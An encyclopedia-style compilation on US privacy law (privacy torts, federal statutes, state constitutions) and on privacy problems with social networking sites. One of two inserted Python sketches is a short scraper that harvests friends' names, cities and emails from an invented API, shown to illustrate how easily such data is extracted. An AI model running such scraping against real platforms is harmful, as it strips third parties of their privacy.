Intrusion upon seclusion occurs when a perpetrator intentionally intrudes, physically, electronically, or otherwise, upon the private space, solitude, or seclusion of a person, or the private affairs or concerns of a person, by use of the perpetrator's physical senses or of electronic devices to oversee or overhear the person's private affairs, or by some other form of investigation, examination, or observation that intrudes upon a person's private matters, if the intrusion would be highly offensive to a reasonable person. Hacking into someone else's computer is a type of intrusion upon privacy,[13] as is secretly viewing or recording private information by still or video camera.[14] In determining whether intrusion has occurred, one of three main considerations may be involved: expectation of privacy; whether there was an intrusion, invitation, or exceedance of invitation; or deception, misrepresentation, or fraud to gain admission. Intrusion is "an information-gathering, not a publication, tort ... legal wrong occurs at the time of the intrusion. No publication is necessary".[15]

Restrictions against the invasion of privacy encompass journalists as well: "The First Amendment has never been construed to accord newsmen immunity from torts or crimes committed during the course of newsgathering. The First Amendment is not a license to trespass, to steal, or to intrude by electronic means into the precincts of another's home or office."[15][16]

Public disclosure of private facts arises where one person reveals information which is not of public concern, and the release of which would offend a reasonable person.[17] "Unlike libel or slander, truth is not a defense for invasion of privacy."[13] Disclosure of private facts includes publishing or widespread dissemination of little-known, private facts that are non-newsworthy, not part of public records or public proceedings, not of public interest, and would be offensive to a reasonable person if made public.[15]

False light is a legal term that refers to a tort concerning privacy that is similar to the tort of defamation.
For example, the privacy laws in the United States include a non-public person's right to privacy from publicity which creates an untrue or misleading impression about them. A non-public person's right to privacy from publicity is balanced against the First Amendment right of free speech.

False light laws are "intended primarily to protect the plaintiff's mental or emotional well-being".[18] If a publication of information is false, then a tort of defamation might have occurred. If that communication is not technically false but is still misleading, then a tort of false light might have occurred.[18]

The specific elements of the tort of false light vary considerably, even among those jurisdictions which do recognize this tort. Generally, these elements consist of the following:

Thus in general, the doctrine of false light holds: One who gives publicity to a matter concerning another before the public in a false light is subject to liability to the other for invasion of privacy, if (a) the false light in which the other was placed would be highly offensive to a reasonable person, and (b) the actor had knowledge of or acted in a reckless disregard as to the falsity of the publicized matter and the false light in which the other would be placed.[19]

For this wrong, money damages may be recovered from the first person by the other. At first glance, this may appear to be similar to defamation (libel and slander), but the basis for the harm is different, and the remedy is different in two respects. First, unlike libel and slander, no showing of actual harm or damage to the plaintiff is usually required in false light cases, and the court will determine the amount of damages. Second, being a violation of a constitutional right of privacy, there may be no applicable statute of limitations in some jurisdictions specifying a time limit within which a claim must be filed. Consequently, although it is infrequently invoked, in some cases false light may be a more attractive cause of action for plaintiffs than libel or slander, because the burden of proof may be less onerous.

What does "publicity" mean? A newspaper of general circulation (or comparable breadth), or as few as 3–5 people who know the person harmed? Neither defamation nor false light has ever required that everyone in society be informed of a harmful act, but the scope of "publicity" is variable. In some jurisdictions, publicity "means that the matter is made public, by communicating it to the public at large, or to so many persons that the matter must be regarded as substantially certain to become one of public knowledge."[20]

Moreover, the standards of behavior governing employees of government institutions subject to a state or national Administrative Procedure Act (as in the United States) are often more demanding than those governing employees of private or business institutions like newspapers. A person acting in an official capacity for a government agency may find that their statements are not indemnified by the principle of agency, leaving them personally liable for any damages. Example: if someone's reputation was portrayed in a false light during a personnel performance evaluation in a government agency or public university, one might be wronged if only a small number initially learned of it, or if adverse recommendations were made to only a few superiors (by a peer committee to department chair, dean, dean's advisory committee, provost, president, etc.).
Settled cases suggest false light may not be effective in private school personnel cases,[21] but they may be distinguishable from cases arising in public institutions.

Although privacy is often a common-law tort, most states have enacted statutes that prohibit the use of a person's name or image if used without consent for the commercial benefit of another person.[22]

Appropriation of name or likeness occurs when a person uses the name or likeness of another person for personal gain or commercial advantage. An action for misappropriation of the right of publicity protects a person against loss caused by appropriation of personal likeness for commercial exploitation. A person's exclusive right to control their name and likeness, preventing others from exploiting them without permission, is protected in a manner similar to a trademark action, with the person's likeness, rather than the trademark, being the subject of the protection.[13]

Appropriation is the oldest recognized form of invasion of privacy, involving the use of an individual's name, likeness, or identity without consent for purposes such as ads, fictional works, or products.[15] "The same action – appropriation – can violate either an individual's right of privacy or right of publicity. Conceptually, however, the two rights differ."[15]

The Fair Credit Reporting Act became effective on April 25, 1971, and implemented limitations on the information that could be collected, stored, and utilized by agencies such as credit bureaus, tenant screenings, and health agencies. The law also defined the rights granted to individuals with regard to their financial information, including the right to obtain a credit score; the right to know what information is in one's financial file; the right to know when one's information is being accessed and used; and the right to dispute any inaccurate or incorrect information.[23]

The Video Privacy Protection Act of 1988 (VPPA) was signed into law by President Ronald Reagan to preserve the privacy of people's information collected when they rented, purchased, or delivered audio visual materials, specifically videotapes.[24] The law arose out of the Bork tapes controversy surrounding the Washington City Paper's publication of a list of films rented by Robert Bork, a U.S. District of Columbia Circuit Court of Appeals judge who had been nominated to fill a seat on the United States Supreme Court at the time.[25] The law prohibits the disclosure of personal information collected by video tape service providers unless it falls under certain exceptions.[26] The VPPA became a focus of attention in the legal industry once again around 2022. Its revival came as part of a larger trend in consumer class actions filed based on privacy law violations, both through new laws like the California Consumer Privacy Act and older laws like the VPPA and wiretapping statutes.

Signed into law on August 21, 1996, the Health Insurance Portability and Accountability Act (HIPAA) is a piece of legislation passed in the United States that limits the amount and types of information that can be collected and stored by healthcare providers. This includes limits on how that information can be obtained, stored, and released.[27] HIPAA also developed data confidentiality requirements that are a part of "The Privacy Rule."[28]

The Gramm-Leach-Bliley Act (GLBA) is a federal law that was signed into effect on November 12, 1999.
This act placed increased limits and requirements on data collection by financial institutions, as well as limits on how that information could be collected and stored. It focused on requiring financial institutions to take specific measures to increase the safety and confidentiality of the information being collected. In addition, the law also put limitations on what type of data could be collected by financial institutions and how they could use that information.[27] The act strives to protect NPI, or nonpublic personal information, which is any information collected regarding an individual's finances that is not otherwise publicly available.[28]

The Children's Online Privacy Protection Act (COPPA), which took effect on April 21, 2000, is a federal law in the United States that puts severe restrictions on what data companies can collect, share, or sell about children who are under the age of 13.[29] A core provision under COPPA is that a website operator must "obtain verifiable parental consent before any collection, use, or disclosure of personal information from children."[30]

Although the word "privacy" is never used in the text of the United States Constitution,[31] there are constitutional limits to the government's intrusion into individuals' right to privacy. This is true even when pursuing a public purpose such as exercising police powers or passing legislation. The Constitution, however, only protects against state actors. Invasions of privacy by individuals can only be remedied under previous court decisions.

The First Amendment protects the right to free assembly, broadening privacy rights. The Fourth Amendment to the Constitution of the United States ensures that "the right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no warrants shall issue, but upon probable cause, supported by oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized." The Fourth Amendment was the Framers' attempt to protect each citizen's spiritual and intellectual integrity.[citation needed] A government that violates the Fourth Amendment in order to use evidence against a citizen is also violating the Fifth Amendment.[32] The Ninth Amendment declares that "The enumeration in the Constitution, of certain rights, shall not be construed to deny or disparage others retained by the people."

The Supreme Court has interpreted the Fourteenth Amendment as providing a substantive due process right to privacy. This was first affirmed by several Supreme Court Justices in Griswold v. Connecticut, a 1965 decision protecting a married couple's rights to contraception. In Roe v. Wade (1973), the Supreme Court invoked a "right to privacy" as creating a right to an abortion, sparking a lasting nationwide debate on the meaning of the term "right to privacy". In Lawrence v. Texas (2003), the Supreme Court invoked the right to privacy regarding the sexual practices of same-sex couples. However, due to Dobbs v.
Jackson Women's Health Organization (2022) breaking many precedents set by Griswold and Roe, the privacy interpretations brought about specifically by these cases are currently of ambiguous legal force.[citation needed]

On August 22, 1972, the Alaska Right of Privacy Amendment, Amendment 3, was approved with 86% of the vote in support of the legislatively referred constitutional amendment.[33] Article I, Section 22 of Alaska's constitution states, "The right of the people to privacy is recognized and shall not be infringed. The legislature shall implement this section."[34]

The California Constitution articulates privacy as an inalienable right.[35] CA SB 1386 expands on privacy law and guarantees that if a company exposes a Californian's sensitive information, this exposure must be reported to the citizen. This law has inspired many states to come up with similar measures.[36] California's "Shine the Light" law (SB 27, CA Civil Code § 1798.83), operative on January 1, 2005, outlines specific rules regarding how and when a business must disclose use of a customer's personal information and imposes civil damages for violation of the law.

California's Reader Privacy Act was passed into law in 2011.[37] The law prohibits a commercial provider of a book service, as defined, from disclosing, or being compelled to disclose, any personal information relating to a user of the book service, subject to certain exceptions. It requires a provider to disclose personal information of a user only if a court order has been issued, as specified, and certain other conditions have been satisfied, and it imposes civil penalties on a provider of a book service for knowingly disclosing a user's personal information to a government entity in violation of these provisions. This law is applicable to electronic books in addition to print books.[38]

The California Privacy Rights Act created the California Privacy Protection Agency, the first data protection agency in the United States.[39][40]

Article I, §23 of the Florida Constitution states that "Every natural person has the right to be let alone and free from governmental intrusion into the person's private life except as otherwise provided herein. This section shall not be construed to limit the public's right of access to public records and meetings as provided by law."[41]

Article 2, §10 of the Montana Constitution states that "The right of individual privacy is essential to the well-being of a free society and shall not be infringed without the showing of a compelling state interest".[42]

Article 1, §7 of the Washington Constitution states that "No person shall be disturbed in his private affairs, or his home invaded, without authority of law".[43]

The right to privacy is also protected by more than 600 state laws and by a dozen federal laws, like those protecting health and student information and limiting electronic surveillance.[46] As of 2022, however, only five states had data privacy laws.[47]

Several of the US federal privacy laws have substantial "opt-out" requirements, requiring that the individual specifically opt out of commercial dissemination of personally identifiable information (PII). In some cases, an entity wishing to "share" (disseminate) information is required to provide a notice, such as a GLBA notice or a HIPAA notice, requiring individuals to specifically opt out.[48] These "opt-out" requests may be executed either by use of forms provided by the entity collecting the data, with or without separate written requests.
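The opt-out model described above can be pictured as a simple data-handling rule: before disseminating a record of personally identifiable information, the holder checks whether the individual has an opt-out request on file. The sketch below is a hypothetical Python illustration, not the text of any statute or a real compliance system; the record fields and function names are invented for the example.

# Hypothetical sketch of an "opt-out" check before sharing PII.
# Field and function names are invented; this is not a real compliance API.
from dataclasses import dataclass

@dataclass
class CustomerRecord:
    name: str
    email: str
    opted_out: bool = False  # set True when the customer returns an opt-out form

def share_with_third_party(record: CustomerRecord) -> bool:
    """Disseminate PII only if the customer has not opted out."""
    if record.opted_out:
        print(f"Blocked: {record.name} has opted out of data sharing.")
        return False
    print(f"Shared: {record.name} <{record.email}>")
    return True

# A customer who returned the opt-out form included with a GLBA-style notice.
alice = CustomerRecord("Alice", "alice@example.com", opted_out=True)
bob = CustomerRecord("Bob", "bob@example.com")  # no opt-out on file

share_with_third_party(alice)  # Blocked
share_with_third_party(bob)    # Shared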
The Health Information Technology for Economic and Clinical Health Act (HITECH Act) is an important piece of legislation in the United States that relates to the privacy of health-related information. Enacted as part of the American Recovery and Reinvestment Act of 2009, the HITECH Act addresses the privacy and security concerns associated with the electronic transmission of health information.
https://en.wikipedia.org/wiki/Privacy_laws_of_the_United_States
Since the arrival of early social networking sites in the early 2000s, online social networking platforms have expanded exponentially, with the biggest names in social media in the mid-2010s being Facebook, Instagram, Twitter and Snapchat. The massive influx of personal information that has become available online and stored in the cloud has put user privacy at the forefront of discussion regarding the database's ability to safely store such personal information. The extent to which users and social media platform administrators can access user profiles has become a new topic of ethical consideration, and the legality, awareness, and boundaries of subsequent privacy violations are critical concerns in the advancing technological age.[1]

A social network is a social structure made up of a set of social actors (such as individuals or organizations), sets of dyadic ties, and other social interactions between actors. Privacy concerns with social networking services are a subset of data privacy, involving the right of mandating personal privacy concerning the storing, re-purposing, provision to third parties, and displaying of information pertaining to oneself via the Internet. Social network security and privacy issues result from the large amounts of information these sites process each day. Features that invite users to participate—messages, invitations, photos, open platform applications and other applications—are often venues for others to gain access to a user's private information. In addition, the technologies needed to deal with users' information may intrude on their privacy.

The advent of Web 2.0 has caused social profiling and is a growing concern for internet privacy.[2] Web 2.0 is the system that facilitates participatory information sharing and collaboration on the Internet, in social networking media websites like Facebook and MySpace.[2] These social networking sites have seen a boom in their popularity beginning in the late 2000s. Through these websites many people give out their personal information on the internet. These social networks keep track of all interactions used on their sites and save them for later use.[3] Issues include cyberstalking, location disclosure, social profiling, third-party personal information disclosure, and government use of social network websites in investigations without the safeguard of a search warrant.

Before social networking sites exploded over the past decade, there were earlier forms of social networking dating back to 1997, such as Six Degrees and Friendster. While these two social media platforms were introduced, additional forms of social networking included online multiplayer games, blog and forum sites, newsgroups, mailing lists and dating services. They created a backbone for the new modern sites. Since the start of these sites, privacy has become a concern for the public. In 1996, a young woman in New York City was on a first date with an online acquaintance and later sued for sexual harassment after her date tried to play out some of the sexual fantasies they had discussed while online. This is just an early example of many more issues to come regarding internet privacy.[4]

In the past, social networking sites primarily consisted of the capability to chat with others in a chat room, which was far less popular than social networks today. People using these sites were seen as "techies" unlike users in the current era.
One of the early privacy cases concerned MySpace, due to "stalking of minors, bullying, and privacy issues", which inevitably led to the adoption of "age requirements and other safety measures".[5] It is very common in society now for events such as stalking and "catfishing" to occur. According to Kelly Quinn, "the use of social media has become ubiquitous, with 73% of all U.S. adults using social network sites today and significantly higher levels of use among young adults and females." Social media sites have grown in popularity over the past decade, and they only continue to grow. A majority of the United States population uses some sort of social media site.[6]

Several causes contribute to the invasion of privacy throughout social networking platforms. It has been recognized that "by design, social media technologies contest mechanisms for control and access to personal information, as the sharing of user-generated content is central to their function." This shows that social networking companies need private information to become public so their sites can operate. They require people to share and connect with each other.[6] This may not necessarily be a bad thing; however, one must be aware of the privacy concerns. Even with privacy settings, posts on the internet can still be shared with people beyond a user's followers or friends. One reason for this is that "English law is currently incapable of protecting those who share on social media from having their information disseminated further than they intend." Information always has the chance to be unintentionally spread online. Once something is posted on the internet, it becomes public and is no longer private. Users can turn privacy settings on for their accounts; however, that does not guarantee that information will not go beyond its intended audience. Pictures and posts can be saved, and posts may never really get deleted. In 2013, the Pew Research Center found that "60% of teenage Facebook users have private profiles." This suggests that privacy is definitely something that people still wish to obtain.[7]

A person's life becomes much more public because of social networking. Social media sites have allowed people to connect with many more people than would be possible through in-person interactions alone. People can connect with users from all across the world whom they may never have the chance to meet in person. This can have positive effects; however, it also raises many concerns about privacy. Information can be posted about a person that they do not want getting out. In the book It's Complicated, the author, Danah Boyd, explains that some people "believe that a willingness to share in public spaces—and, most certainly, any act of exhibitionism and publicity—is incompatible with a desire for personal privacy." Once something is posted on the internet, it becomes accessible to multiple people and can even be shared beyond just assumed friends or followers. Many employers now look at a person's social media before hiring them for a job or position. Social media has become a tool that people use to find out information about a person's life. Someone can learn a lot about a person based on what they post before they even meet them once in person. The ability to achieve privacy is a never-ending process. Boyd describes that "achieving privacy requires the ability to control the social situation by navigating complex contextual cues, technical affordances, and social dynamics."
Society is constantly changing; therefore, the ability to read social situations in order to maintain privacy has to change with it.[8]

Social networking sites vary in the levels of privacy offered. For some social networking sites like Facebook, providing real names and other personal information is encouraged by the site (onto a page known as a 'Profile'). This information usually consists of the birth date, current address, and telephone number(s). Some sites also allow users to provide more information about themselves such as interests, hobbies, favorite books or films, and even relationship status. However, there are other social network sites, such as Match.com, where most people prefer to be anonymous. Thus, linking users to their real identity can sometimes be rather difficult. Nevertheless, individuals can sometimes be identified with face re-identification. Studies have been done on two major social networking sites, and it was found that by overlapping 15% of the similar photographs, profile pictures with similar pictures over multiple sites can be matched to identify the users.[9]

"According to research conducted by the Boston Consulting Group, privacy of personal data is a top issue for 76 percent of global consumers and 83 percent of U.S. consumers."[10] Six in ten Americans (61%) have said they would like to do more to protect their privacy.[11]

For sites that do encourage information disclosure, it has been noted that a majority of the users have no trouble disclosing their personal information to a large group of people.[9] In 2005, a study was performed to analyze data from 540 Facebook profiles of students enrolled at Carnegie Mellon University. It revealed that 89% of the users gave genuine names, and 61% gave a photograph of themselves for easier identification.[9] The majority of users also had not altered their privacy settings, allowing a large number of unknown users to have access to their personal information (the default setting originally allowed friends, friends of friends, and non-friends of the same network to have the full view of a user's profile). It is possible for users to block other users from locating them on Facebook, but this must be done on an individual basis and therefore appears not to be commonly used for a wide number of people. Most users do not realize that while they may make use of the security features on Facebook, the default setting is restored after each update. All of this has led to many concerns that users are displaying far too much information on social networking sites, which may have serious implications for their privacy. Facebook was criticized due to the perceived laxity regarding privacy in the default setting for users.[12]

The "Privacy Paradox" is a phenomenon that occurs when individuals who state that they have concerns about their privacy online take no action to secure their accounts.[13] Furthermore, while individuals may take extra security steps for other online accounts, such as those related to banking or finance, this does not extend to social media accounts.[13] Some of these basic or simple security steps would include deleting cookies and browser history, or checking one's computer for spyware.[13] Some may attribute this lack of action to "third-person bias". This occurs when people are aware of risks but do not believe that these risks apply or relate to them as individuals.[13] Another explanation is a simple risk-reward analysis.
Individuals may be willing to risk their privacy to reap the rewards of being active on social media.[13] Oftentimes, the risk of being exploited for the private information shared on the internet is overshadowed by the rewards of exclusively sharing personal information that bolsters the appeal of the social media user.[14]

In the study by Van der Velden and El Emam, teenagers are described as "active users of social media, who seem to care about privacy, but who also reveal a considerable amount of personal information."[15] This brings up the issue of what should be managed privately on social media, and is an example of the Privacy Paradox. This study in particular looked at teenagers with mental illness and how they interact on social media. Researchers found that "it is a place where teenage patients stay up-to-date about their social life—it is not seen as a place to discuss their diagnosis and treatment."[15] Therefore, social media is a forum that needs self-protection and privacy. Privacy should be a main concern, especially for teens who may not be entirely informed about the importance and consequences of public versus private use, as reflected in the "discrepancy between stated privacy concerns and the disclosure of private information."[15]

Users are often the targets as well as the source of information in social networking. Users leave digital imprints while browsing social networking sites or services. Several online studies have found that users place trust in websites and social networking sites. As for what trust means here,[16] "trust is defined in (Mayer, Davis, and Schoorman, 1995) as "the willingness of a party to be vulnerable to the actions of another party based on the expectation that the other will perform a particular action important to the trustor, irrespective of the ability to monitor or control that other party" (p. 712)". In a survey[17] conducted by Carnegie Mellon University, a majority of users provided their city of residence, phone numbers, and other personal information, while clearly unaware of the consequences of sharing certain information. Adding to this, social networking users come from various cities, remote villages, towns, cultures, traditions, religions, backgrounds, economic classes, educational backgrounds, time zones and so on, which highlights a significant gap in awareness. The survey results of the paper[17] suggest, "These results show that the interaction of trust and privacy concern in social networking sites is not yet understood to a sufficient degree to allow accurate modeling of behavior and activity. The results of the study encourage further research in the effort to understand the development of relationships in the online social environment and the reasons for differences in behavior on different sites."

A survey conducted among social networking users at Carnegie Mellon University indicated the following reasons for the lack of user awareness:

1) People's disregard of privacy risks due to trust in the privacy and protection offered by social networking sites.
2) Availability of users' personal details to third-party tools and applications.
3) APIs and frameworks that enable any user with a fair amount of technical knowledge to extract other users' data.
4) Cross-site forgery and other possible website threats.

There is hence a pressing need to improve users' awareness swiftly in order to address the growing security and privacy concerns that stem from simple unawareness.
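To make the third point above concrete, the following is a minimal sketch of how little code it takes to harvest profile data through a public API. Everything here is hypothetical: the host, endpoint path, and field names are invented for illustration and belong to no real platform.

```python
# Hypothetical illustration of API-based data extraction; the host,
# endpoint, and field names are invented and belong to no real platform.
import json
from urllib.request import urlopen

def harvest_friends(user_id: str) -> list[dict]:
    """Fetch a user's friend list from an imaginary social-network API."""
    url = f"https://api.example-sns.com/v1/users/{user_id}/friends"
    with urlopen(url) as response:
        payload = json.load(response)
    # A scraper would typically keep only the personally revealing fields.
    return [
        {"name": f["name"], "city": f.get("city"), "email": f.get("email")}
        for f in payload["friends"]
    ]

# A few lines like these, looped over user IDs, are enough to build a
# sizeable profile database - which is why point 3 above matters.
print(harvest_friends("12345"))
```

The point of the sketch is not the specific calls but the asymmetry: the barrier to collecting such data programmatically is far lower than most users assume.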
Social networking sites themselves can take responsibility and make such awareness possible by participatory methods through virtual online means.[18]

To improve users' awareness, a possible method is to offer privacy-related training that helps people understand the privacy concerns that come with the use of social media websites or apps.[19] The training can include information on how certain companies or apps help secure users' privacy, as well as skills for protecting one's privacy.[19]

Studies have also shown that privacy literacy plays a role in enhancing the use of privacy-protective measures, and that people who are concerned about privacy were less likely to use online services and share personal information.[20]

There are several ways for third parties to access user information. Flickr is an example of a social media website that provides geotagged photos that allow users to view the exact location where a person is visiting or staying. Geotagged photos make it easy for third-party users to see where an individual is located or traveling to.[21] There is also growing use of phishing, which reveals sensitive information through secretive links and downloads in email, messages, and other communications. Social media has opened up an entirely new realm for hackers to get information from normal posts and messages.[22]

Nearly all of the most popular applications on Facebook—including Farmville, Causes, and Quiz Planet—have been sharing users' information with advertising and tracking companies.[23] Even though Facebook's privacy policy says they can provide "any of the non-personally identifiable attributes we have collected"[24] to advertisers, they violate this policy. If a user clicks a specific ad on a page, Facebook will send the address of this page to advertisers, which will directly lead to a profile page. In this case, it is easy to identify users' names.[25] For example, Take With Me Learning is an app that allows teachers and students to keep track of their academic process. The app requires personal information that includes school name, user's name, email, and age. But Take With Me Learning was created by a company that was known for illegally gathering students' personal information without their knowledge and selling it to advertisement companies. This company had violated the Children's Online Privacy Protection Act (COPPA), used to keep children safe from identity theft while using the internet.[26] Most recently, Facebook has been scrutinized for the collection of users' data by Cambridge Analytica. Cambridge Analytica was collecting data from Facebook users after they agreed to take a psychology questionnaire. Not only could Cambridge Analytica access the data of the person who took the survey, it could also access all of the data of that person's Facebook friends. This data was then used in hopes of swaying people's beliefs so that they would vote for a certain politician. While what Cambridge Analytica did by collecting the data may or may not be illegal, they then transferred the data they acquired to third parties so that it could be used to sway voters.[27] Facebook was fined £500,000 in the UK and $5bn (£4bn) in the US, and in 2020, the company was taken to court by Australia's privacy regulator with the prospect of a fine of A$1.7m (£860,000).[28]

An application programming interface (API) is a set of routines, protocols, and tools for building software applications. By using query languages, sharing content and data between communities and applications became much easier.
APIs simplify all of that by limiting outside program access to a specific set of features—often enough, requests for data of one sort or another. APIs clearly define exactly how a program will interact with the rest of the software world—saving time.[29]

An API allows software to "speak with other software."[30] Furthermore, an API can collect and provide information that is not publicly accessible. This is extremely enticing for researchers due to the greater number of possible avenues of research.[30] The use of an API for data collection can be a focal point of the privacy conversation, because while the data can be anonymous, the difficulty is understanding when it becomes an invasion of privacy.[30] Personal information can be collected en masse, but the debate over whether it breaches personal privacy turns on the inability to match this information with specific people.[30]

There have, however, been some concerns with APIs because of the scandal between Facebook and the political consulting firm Cambridge Analytica. What happened was "Facebook allowed a third-party developer to engineer an application for the sole purpose of gathering data. And the developer was able to exploit a loophole to gather information on not only people who used the app but all their friends — without them knowing."[31]

In 2020, critics praised Apple and Google for their contact tracing API, which had technical specifications that were conscious of privacy concerns.[32]

Search engines are an easy way to find information without scanning every site yourself. Keywords typed into a search box lead to the results, so it is necessary to make sure that the keywords typed are precise and correct. There are many such search engines, some of which may lead the user to fake sites which may obtain personal information or are laden with viruses. Furthermore, some search engines, like DuckDuckGo, will not violate the user's privacy.[33]

On most social media websites, a user's geographical location can be gathered either by users (through voluntary check-in applications like Foursquare and Facebook Places) or by applications (through technologies like IP address geolocation, cellphone network triangulation, RFID and GPS). The approach used matters less than the result, which is that the content produced is coupled with the geographical location where the user produced it. Additionally, many applications attach other forms of information like OS language, device type and capture time. The result is that by posting, tweeting or taking pictures, users produce and share an enormous amount of personal information.[34]

Many large platforms reveal a part of a user's email address or phone number when the 'forgotten password' function is used. Often the whole email address can be derived from this hint, and phone digits can be compared with known numbers.[35]

By using this accessible data along with data mining technology, users' information can be used in different ways to improve customer service. Based on your retweets, likes, and hashtags, Twitter can recommend topics and advertisements. Twitter's suggestions for whom to follow[36] are made by this recommendation system. Commerce sites such as Amazon make use of users' information to recommend items to users. Recommendations are based on at least prior purchases, shopping cart, and wishlist. Affinity analysis is a data mining technique used to understand the purchase behavior of customers.
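As a concrete illustration of affinity analysis, the sketch below (invented toy data, not any platform's actual pipeline) counts how often pairs of items co-occur across users' histories and recommends the items most strongly associated with a given one:

```python
# A minimal sketch of affinity analysis on invented purchase histories.
from collections import Counter
from itertools import combinations

# Hypothetical purchase/like histories; a real platform would mine
# millions of such records from its own logs.
histories = [
    {"coffee", "mug", "grinder"},
    {"coffee", "mug"},
    {"coffee", "grinder"},
    {"tea", "mug"},
]

# Count how often each pair of items appears in the same user's history.
pair_counts = Counter()
for items in histories:
    for a, b in combinations(sorted(items), 2):
        pair_counts[(a, b)] += 1

def recommend(item, k=2):
    """Return the k items most frequently co-occurring with `item`."""
    scores = Counter()
    for (a, b), n in pair_counts.items():
        if a == item:
            scores[b] += n
        elif b == item:
            scores[a] += n
    return [other for other, _ in scores.most_common(k)]

print(recommend("coffee"))  # e.g. ['grinder', 'mug']
```

Production recommenders are far more elaborate, but the privacy implication is visible even at this scale: the co-occurrence counts are themselves a derived record of user behavior.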
By using machine learning methods, whether a user is a potential follower of Starbucks, for example, can be predicted.[37] In that case, it is possible to improve the quality and coverage of applications. In addition, user profiles can be used to identify similar users.

According to Gary Kovacs's speech about tracking our online trackers, when he used the internet to find an answer to a question, "We are not even 2 bites into breakfast and there are already nearly 25 sites that are tracking me", and he was navigated by 4 of them.[38]

Studies have shown that people's belief in the right to privacy is the most pivotal predictor of their attitudes concerning online privacy.[39]

The Privacy Act of 1974 (a United States federal law) states:

Disclosure in this context refers to any means of communication, be it written, oral, electronic or mechanical. It states that agencies are forbidden to give out, or disclose, the information of an individual without being given consent by the individual to release that information. However, it falls on the individual to prove that a wrongful disclosure, or disclosure in general, has occurred.[40] Because of this, social networking sites such as Facebook ask for permission when a third-party application requests the user's information. Although the Privacy Act of 1974 does a lot to limit privacy invasion through third-party disclosure, it does list a series of twelve exceptions that deem disclosure permissible:

Social profiling allows Facebook and other social networking websites to filter advertisements, assigning specific ones to specific age groups, gender groups, and even ethnicities.[2]

Data aggregation sites like Spokeo have highlighted the feasibility of aggregating social data across social sites as well as integrating it with public records. A 2011 study[41] highlighted these issues by measuring the amount of unintended information leakage over a large number of users with varying numbers of social networks. It identified and measured information that could be used in attacks against what-you-know security. Studies[42][43] have also pointed to most social networks unintentionally providing third-party advertising and tracking sites with personal information. This raises the issue of private information inadvertently being sent to third-party advertising sites via referrer strings or cookies.

Civil libertarians worry that social networking sites, particularly Facebook, have greatly diminished user confidentiality in numerous ways.[44] For one thing, when social media platforms store private data, they also have complete access to that material. To sustain their profitability, applications like Facebook examine and market personal information by logging data through cookies, small files that stockpile the data on someone's device. Companies such as Facebook carry extensive amounts of private user information on file regarding individuals' "likes, dislikes, and preferences", which are of high value to marketers.[45] As Facebook reveals user information to advertising and marketing organizations, personalized endorsements appear on news feeds based on "surfing behavior, hobbies, or pop culture preferences".[44] For those reasons, Facebook's critics fear that social networking companies may seek business ventures with stockholders by sharing user information in exchange for profits.
Additionally, they argue that since Facebook demonstrates an illusion of privacy presented by a "for-friends-only" type of platform, individuals find themselves more inclined to showcase more personal information online. According to the critics, users might notice that the sponsorships and commercials are tailored to their disclosed private data, which could result in a sense of betrayal.[44]

A number of institutions have expressed concern over the lack of privacy granted to users on social networking sites. These include schools, libraries, and government agencies.[46]

Libraries in particular, being concerned with the privacy of individuals, have debated allowing library patrons to access social networking sites on public library computers. While only 19% of librarians reportedly express real concern over social networking privacy, they have been particularly vocal in voicing their concerns.[47] Some have argued that the lack of privacy found on social networking sites is contrary to the ethics supported by library organizations, and the latter should thus be extremely apprehensive about dealing with the former.[47] Supporters of this view present their argument from the codes of ethics held by both the American Library Association and the UK-based Chartered Institute of Library and Information Professionals, which affirm a commitment to upholding privacy as a fundamental right.[47] In 2008, a study performed in fourteen public libraries in the UK found that 50% blocked access to social networking sites.[48] Many school libraries have also blocked Facebook out of fear that children may be disclosing too much information on Facebook. However, as of 2011, Facebook has taken efforts to combat this concern by deleting profiles of users under the age of thirteen.[49]

As there is so much information provided, other things can be deduced, such as a person's social security number, which can then be used as part of identity theft.[50] In 2009, researchers at Carnegie Mellon University published a study showing that it is possible to predict most and sometimes all of an individual's 9-digit Social Security number using information gleaned from social networks and online databases (see "Predicting Social Security Numbers from Public Data" by Acquisti and Gross).[51] In response, various groups have advised that users either do not display their number, or hide it from Facebook 'friends' they do not personally know.[52] Cases have also appeared of users having photographs stolen from social networking sites in order to assist in identity theft.[53] According to the Huffington Post, Bulgarian IT consultant Bogomil Shopov claimed in a recent blog to have purchased personal information on more than 1 million Facebook users, for the shockingly low price of US$5.00. The data reportedly included users' full names, email addresses, and links to their Facebook pages.[54] The following information could be used to steal a user's identity: full name including middle name, date of birth, hometown, relationship status, residential information, and other hobbies and interests.

Among all other age groups, in general, the most vulnerable victims of private-information-sharing behavior are preteens and early teenagers. According to research, many teens report that social media and social networking services are important to building relationships and friendships. With this fact come privacy concerns such as identity theft, stealing of personal information, and data usage by advertising companies.
Besides using social media to connect, teenagers use social networking services for political purposes and for obtaining information. However, sometimes social media can become a place for harassment and disrespectful political debates that fuel resentment and raise privacy concerns.[11][55]

There have been age restrictions put on numerous websites, but how effective they are is debatable.[56] Findings have unveiled that informative opportunities regarding internet privacy, as well as concerns from parents, teachers, and peers, play a significant role in shaping internet users' behavior with regard to online privacy.[57][58] Additionally, other studies have found that heightening adolescents' concern for their privacy leads to a greater probability that they will adopt privacy-protecting behaviors.[59] In the technological culture that society is developing into, not only should adolescents' and parents' awareness be raised, but society as a whole should acknowledge the importance of online privacy.[60]

Preteens and early teenagers are particularly susceptible to social pressures that encourage young people to reveal personal data when posting online. Teens often post information about their personal life, such as activities they are doing, their current locations, and who they spend time with, as well as their thoughts and opinions. They tend to share this information because they do not want to feel left out or judged by other adolescents who are practicing these sharing activities already. Teens are motivated to keep themselves up to date with the latest gossip, current trends, and trending news and, in doing so, they allow themselves to become victims of cyberbullying and stalking; this could potentially harm them when pursuing future job opportunities and, in the context of privacy, makes them more inclined to share their private information with the public. This is concerning because preteens and teenagers are the least educated on how public social media is, how to protect themselves online, and the detrimental consequences that could come from sharing too much personal information online. As more and more young individuals join social media sites, they believe it is acceptable to post whatever they are thinking, as they don't realize the potential harm that information can do to them and how they are sacrificing their own privacy.[61] "Teens are sharing more information about themselves on social media sites than they did in the past."[62] Preteens and teenagers are sharing information on social media sites such as Facebook, Snapchat, Instagram, Twitter, Pinterest, and more by posting pictures and videos of themselves, unaware of the privacy they are sacrificing.[63] Adolescents post their real names, birthdays, and email addresses to their social media profiles.[63] Children have less mobility than they have had in the past. Everything these teenagers do online is so they can stay in the loop of social opportunities, and the concern is that they do so in a way that is not only traceable but in a very persistent environment that motivates people to continue sharing information about themselves 